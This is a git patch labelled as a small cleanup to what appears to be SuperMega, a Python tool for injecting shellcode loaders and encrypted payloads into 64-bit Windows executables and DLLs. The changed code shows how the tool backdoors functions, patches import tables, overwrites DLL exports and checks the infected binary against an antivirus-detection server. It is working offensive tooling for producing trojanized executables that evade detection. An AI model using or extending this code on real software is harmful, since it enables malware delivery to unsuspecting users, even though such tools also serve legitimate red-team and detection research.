From 7ceb0af5a4c6c524b1a61f8aada6fce7a9620bff Mon Sep 17 00:00:00 2001 From: Dobin Date: Mon, 13 May 2024 18:43:27 +0100 Subject: [PATCH] refactor: small code cleanup --- model/defs.py | 6 ++++- phases/asmparser.py | 9 +++++--- phases/injector.py | 53 +++++++++++++++++++++------------------------ supermega.py | 26 ++++++++++++---------- 4 files changed, 50 insertions(+), 44 deletions(-) diff --git a/model/defs.py b/model/defs.py index b893915..1a8ca65 100644 --- a/model/defs.py +++ b/model/defs.py @@ -63,4 +63,8 @@ class IatEntry(): def __str__(self): return "IatEntry: dll_name: {} func_name: {} iat_vaddr: 0x{:X}".format( - self.dll_name, self.func_name, self.iat_vaddr) \ No newline at end of file + self.dll_name, self.func_name, self.iat_vaddr) + + + +CODE_INJECT_SIZE_CHECK_ADD = 128 \ No newline at end of file diff --git a/phases/asmparser.py b/phases/asmparser.py index 948aa8f..2e64b6a 100644 --- a/phases/asmparser.py +++ b/phases/asmparser.py @@ -55,10 +55,10 @@ def parse_asm_file(carrier: Carrier, asm_text: str, settings: Settings) -> List[ continue # PATCH external shellcode reference - ## mov rdi, QWORD PTR supermega_payload - ## to - ## lea rdi, [shcstart] ; get payload shellcode address if settings.payload_location == PayloadLocation.CODE: + ## mov rdi, QWORD PTR supermega_payload + ## to + ## lea rdi, [shcstart] ; get payload shellcode address if "supermega_payload" in line: updated_line = line updated_line = updated_line.replace( @@ -72,6 +72,9 @@ def parse_asm_file(carrier: Carrier, asm_text: str, settings: Settings) -> List[ lines_out.append(updated_line) continue elif settings.payload_location == PayloadLocation.DATA: + ## mov rdi, QWORD PTR supermega_payload + ## to + ## lea rdi, XXX if "supermega_payload" in line: randbytes: bytes = os.urandom(7) # LEA is 7 bytes string_ref = "supermega_payload" diff --git a/phases/injector.py b/phases/injector.py index bf777d3..dc83d83 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -12,52 +12,54 @@ from pe.superpe import SuperPe from model.project import Project from model.settings import Settings from pe.asmdisasm import * +from model.defs import * logger = logging.getLogger("Injector") -def inject_exe( - main_shc: bytes, - settings: Settings, # Temp - carrier: Carrier, -): +def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier): exe_in = settings.inject_exe_in exe_out = settings.inject_exe_out carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style source_style: FunctionInvokeStyle = settings.source_style - logger.info("--[ Injecting: into {} -> {}".format( - exe_in, exe_out - )) + logger.info("--[ Injecting: into {} -> {}".format(exe_in, exe_out)) - # Read prepared loader shellcode - # And check if it fits into the target code section + # CHECK if shellcode fits into the target code section shellcode_len = len(main_shc) code_sect_size = carrier.superpe.get_code_section().Misc_VirtualSize - if shellcode_len + 128 > code_sect_size: - raise Exception("Error: Shellcode {}+128 too small for target code section {}".format( - shellcode_len, code_sect_size + if shellcode_len + CODE_INJECT_SIZE_CHECK_ADD > code_sect_size: + raise Exception("Error: Shellcode size {}+{} too small for target code section {}".format( + shellcode_len, CODE_INJECT_SIZE_CHECK_ADD, code_sect_size )) # superpe is a representation of the exe file. We gonna modify it, and save it at the end. superpe = SuperPe(exe_in) function_backdoorer = FunctionBackdoorer(superpe) - # Patch IAT if necessary + # Patch IAT (if necessary and wanted) if source_style == FunctionInvokeStyle.iat_reuse: for iatRequest in carrier.get_all_iat_requests(): # skip available addr = superpe.get_vaddr_of_iatentry(iatRequest.name) if addr != None: - logger.info(" IAT {} is at: 0x{:X}".format(iatRequest.name, addr)) + logger.info(" IAT {} is at: 0x{:X}".format(iatRequest.name, addr)) continue iat_name = superpe.get_replacement_iat_for("KERNEL32.dll", iatRequest.name) + + if not settings.fix_missing_iat: + raise Exception("Error: {} not available, but fix_missing_iat is False".format( + iatRequest.name + )) + # do the patch superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name) + # we modify the IAT raw, so reparsing is required superpe.pe.parse_data_directories() shellcode_offset: int = 0 # file offset + + # Special case: DLL exported function direct overwrite if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: - # Special case: DLL exported function direct overwrite logger.info("---[ Inject DLL: Overwrite exported function {} with shellcode".format(settings.dllfunc)) rva = superpe.getExportEntryPoint(settings.dllfunc) @@ -73,14 +75,15 @@ def inject_exe( logger.info(f'----[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{shellcode_offset:X} to overwrite') superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc) - else: # Put it somewhere in the code section, and rewire the flow + else: # EXE/DLL + # Put it somewhere in the code section, and rewire the flow sect = superpe.get_code_section() if sect == None: raise Exception('Could not find code section in input PE file!') sect_size = sect.Misc_VirtualSize # Better than: SizeOfRawData - if sect_size < shellcode_len: - raise Exception("Shellcode too large: {} > {}".format( - shellcode_len, sect_size + if sect_size < shellcode_len + CODE_INJECT_SIZE_CHECK_ADD: + raise Exception("Shellcode too large: {}+{} > {}".format( + shellcode_len, CODE_INJECT_SIZE_CHECK_ADD, sect_size )) shellcode_offset = int((sect_size - shellcode_len) / 2) # centered in the .text section shellcode_offset += sect.PointerToRawData @@ -93,7 +96,7 @@ def inject_exe( superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc) # rewire flow - if superpe.is_dll() and settings.dllfunc != "": + if superpe.is_dll() and settings.dllfunc != "": # DLL if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: # Handled above raise Exception("We should not land here") @@ -129,16 +132,10 @@ def inject_exe( logger.info("--( Write to file: {}".format(exe_out)) superpe.write_pe_to_file(exe_out) - # verify and log - #shellcode = file_readall_binary(shellcode_in) - #shellcode_len = len(shellcode) - #code = extract_code_from_exe_file(exe_out) + # Log code = file_readall_binary(exe_out) in_code = code[shellcode_offset:shellcode_offset+shellcode_len] - #jmp_code = code[function_backdoorer.backdoorOffsetRel:function_backdoorer.backdoorOffsetRel+12] - #if config.debug: observer.add_code_file("exe_extracted_carrier", in_code) - # observer.add_code_file("exe_extracted_jmp", jmp_code) def injected_fix_iat(superpe: SuperPe, carrier: Carrier): diff --git a/supermega.py b/supermega.py index a3edbc2..88a7c96 100644 --- a/supermega.py +++ b/supermega.py @@ -131,13 +131,13 @@ def start(settings: Settings) -> int: def start_real(settings: Settings): - """Main entry point for the application. This is where the magic happens, based on settings""" + """Main entry point for the application. This is where the magic happens (based on settings)""" # Load our input project = Project(settings) project.init() - # check if 64 bit + # CHECK if 64 bit if not project.carrier.superpe.is_64(): raise Exception("Binary is not 64bit: {}".format(project.settings.inject_exe_in)) @@ -147,19 +147,20 @@ def start_real(settings: Settings): project.settings.decoder_style.value, project.settings.carrier_invoke_style.value)) - # Create: Carrier C source files from template (C->C) + # CREATE: Carrier C source files from template (C->C) phases.templater.create_c_from_template(settings, project.payload.len) # If we put the payload into .rdata - # Prepare DataReuseEntry for usage in Compiler/AsmParser + # PREPARE DataReuseEntry for usage in Compiler/AsmParser if settings.payload_location == PayloadLocation.DATA: logger.info("--[ Load payload for use in .rdata injection") project.carrier.add_datareuse_fixup(DataReuseEntry("supermega_payload")) entry = project.carrier.get_reusedata_fixup("supermega_payload") - entry.data = phases.assembler.encode_payload(project.payload.payload_data, settings.decoder_style) # encrypt if selected + entry.data = phases.assembler.encode_payload( + project.payload.payload_data, settings.decoder_style) # encrypt observer.add_code_file("payload_data", project.payload.payload_data) - # Compile: Carrier to .asm (C -> ASM) + # COMPILE: Carrier to .asm (C -> ASM) if settings.generate_asm_from_c: phases.compiler.compile( c_in = settings.main_c_path, @@ -168,23 +169,23 @@ def start_real(settings: Settings): settings = project.settings) # we have the carrier-required IAT entries in carrier.iat_requests - # Check if all are available in infectable, or abort (early check) + # CHECK if all are available in infectable, or abort (early check) if settings.source_style == FunctionInvokeStyle.iat_reuse: functions = project.carrier.get_unresolved_iat() if len(functions) != 0: if settings.fix_missing_iat: - logger.info("Fixing missing IAT entries: {}".format(", ".join(functions))) + logger.info("--[ Fixing missing IAT entries: {}".format(", ".join(functions))) else: raise Exception("IAT entry not found: {}".format(", ".join(functions))) - # Assemble: Assemble .asm to .shc (ASM -> SHC) + # ASSEMBLE: Assemble .asm to .shc (ASM -> SHC) if settings.generate_shc_from_asm: carrier_shellcode: bytes = phases.assembler.asm_to_shellcode( asm_in = settings.main_asm_path, build_exe = settings.main_exe_path) observer.add_code_file("carrier_shc", carrier_shellcode) - # Merge: shellcode/loader with payload (SHC + PAYLOAD -> SHC) + # MERGE: shellcode/loader with payload (SHC + PAYLOAD -> SHC) if settings.payload_location == PayloadLocation.CODE: logger.info("--[ Merge carrier with payload for .text injection".format()) full_shellcode = phases.assembler.merge_loader_payload( @@ -205,10 +206,11 @@ def start_real(settings: Settings): # observer.add_code_file("payload_sgn", file_readall_binary(settings.main_shc_path + ".sgn")) # shutil.move(settings.main_shc_path + ".sgn", settings.main_shc_path) - # inject merged loader into an exe + # inject (merged) loader into an exe. Big task. phases.injector.inject_exe(full_shellcode, settings, project.carrier) observer.add_code_file("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300)) + # Check binary with avred if config.get("avred_server") != "": if settings.verify or settings.try_start_final_infected_exe: filename = os.path.basename(settings.inject_exe_in) @@ -216,7 +218,7 @@ def start_real(settings: Settings): data = f.read() scannerDetectsBytes(data, filename, useBrotli=True, verify=settings.verify) else: - # Start/verify it at the end + # Support automated verification (dev) if settings.verify: logger.info("--[ Verify infected exe") payload_exit_code = phases.injector.verify_injected_exe(